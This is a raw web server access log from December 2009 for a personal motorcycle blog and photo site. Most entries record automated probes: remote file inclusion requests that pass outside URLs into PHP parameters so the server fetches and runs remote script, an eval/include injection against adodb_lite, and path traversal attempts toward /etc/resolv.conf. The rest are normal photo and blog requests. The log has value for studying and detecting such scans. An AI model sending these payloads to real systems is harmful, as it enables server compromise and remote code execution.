116.50.134.6 - - [13/Dec/2009:11:18:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:18:44 -0800] "GET /phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:18:44 -0800] "GET /logs/access_090130.log/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:19:02 -0800] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:19:10 -0800] "GET /logs/access_090126.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:19:19 -0800] "GET /logs/access_081129.log%20%20///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:19:29 -0800] "GET /logs/access_081226.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
78.110.50.121 - - [13/Dec/2009:11:19:34 -0800] "GET /logs/access_081129.log%20%20///?_zb_path=http://n34.biz/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:19:49 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:19:49 -0800] "GET /logs/access_090727.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [13/Dec/2009:11:19:49 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:19:50 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:20:12 -0800] "GET /logs/access_080723.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:45 -0800] "GET /logs/access_080410.log%20%20//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:45 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:45 -0800] "GET /?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 14961 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:46 -0800] "GET /logs/access_080410.log%20%20//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:47 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:20:47 -0800] "GET /?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 200 14960 "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:20:49 -0800] "GET /logs/access_090814.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:20:49 -0800] "GET /logs/access_080619.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:20:49 -0800] "GET /logs/access_091203.log%20%20///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:18 -0800] "GET /logs/access_081111.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:18 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:20 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:21:29 -0800] "GET /logs/access_091007.log%20%20//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:21:35 -0800] "GET /logs/access_091007.log%20%20//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:53 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:54 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:21:55 -0800] "GET /logs/access_081111.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:00 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:00 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:00 -0800] "GET /logs/access_090130.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:01 -0800] "GET /logs/access_090705.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:22:08 -0800] "GET /logs/access_081129.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:35 -0800] "GET /logs/access_090130.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:35 -0800] "GET /logs/access_090705.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:35 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:11:22:35 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
80.93.58.162 - - [13/Dec/2009:11:22:49 -0800] "GET /logs/access_080916.log///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:23:02 -0800] "GET /logs/access_090130.log%20%20/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:23:03 -0800] "GET /logs/access_080710.log%20%20/phphtml.php?htmlclass_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:24:40 -0800] "GET /logs/access_090727.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:24:47 -0800] "GET /logs/access_080723.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:53 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:24:54 -0800] "GET /blog/wp-content/gallery/2008-yuma/001.jpg HTTP/1.1" 200 323977 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:25:08 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.1" 206 134415 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:25:09 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 206 194835 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:25:09 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.1" 206 257571 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:25:09 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 206 243539 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "www.dmulk.com"
75.6.5.162 - - [13/Dec/2009:11:25:09 -0800] "GET /blog/wp-content/gallery/2008-yuma/001.jpg HTTP/1.1" 206 320166 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 GTB6 (.NET CLR 3.5.30729)" "dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:25:23 -0800] "GET /logs/access_090126.log///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:20 -0800] "GET /logs/access_080904.log%20/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:20 -0800] "GET /logs/access_080904.log%20/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:21 -0800] "GET /logs/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:21 -0800] "GET /logs/access_080904.log%20/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:21 -0800] "GET /logs/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
195.22.14.131 - - [13/Dec/2009:11:26:22 -0800] "GET /logs/index.php?menu=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/resolv.conf%20 HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:26:41 -0800] "GET /logs/access_081111.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:26:41 -0800] "GET /logs///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 130081 "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:26:41 -0800] "GET //?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 200 14927 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:26:56 -0800] "GET /common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:26:57 -0800] "GET /logs/access_090523.log%20%20/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:26:57 -0800] "GET /logs/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [13/Dec/2009:11:26:59 -0800] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "-" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:09 -0800] "GET /common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:09 -0800] "GET /logs/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:09 -0800] "GET /logs/access_090523.log%20%20/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.88.33.77 - - [13/Dec/2009:11:27:14 -0800] "GET /blog/index.php/page/2/ HTTP/1.0" 200 20181 "http://dmulk.com/blog/page/2/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:28 -0800] "GET /logs/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:28 -0800] "GET /logs/access_090516.log/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:29 -0800] "GET /index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 200 14795 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:32 -0800] "GET /logs/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:32 -0800] "GET /logs/access_090516.log/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:33 -0800] "GET /index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 200 14795 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:39 -0800] "GET /logs/access_091110.log/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:43 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:43 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:43 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:44 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:44 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:27:44 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:27:47 -0800] "GET /logs/access_091110.log/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:11:28:25 -0800] "GET /logs/access_091203.log///skin/uks_gallery_v3010/setup.php?dir=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:28:27 -0800] "GET /logs/access_090516.log%20%20/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:28:27 -0800] "GET /logs/access_091110.log%20%20/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:28:34 -0800] "GET /logs/access_090516.log%20%20/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:28:34 -0800] "GET /logs/access_091110.log%20%20/index.php?body=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:37 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:37 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/access_091124.log%20%20/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/access_091124.log%20%20/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:28:38 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr002.JPG HTTP/1.0" 200 287373 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr006.JPG HTTP/1.1" 200 109371 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr003.JPG HTTP/1.1" 200 299517 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr005.JPG HTTP/1.1" 200 98538 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
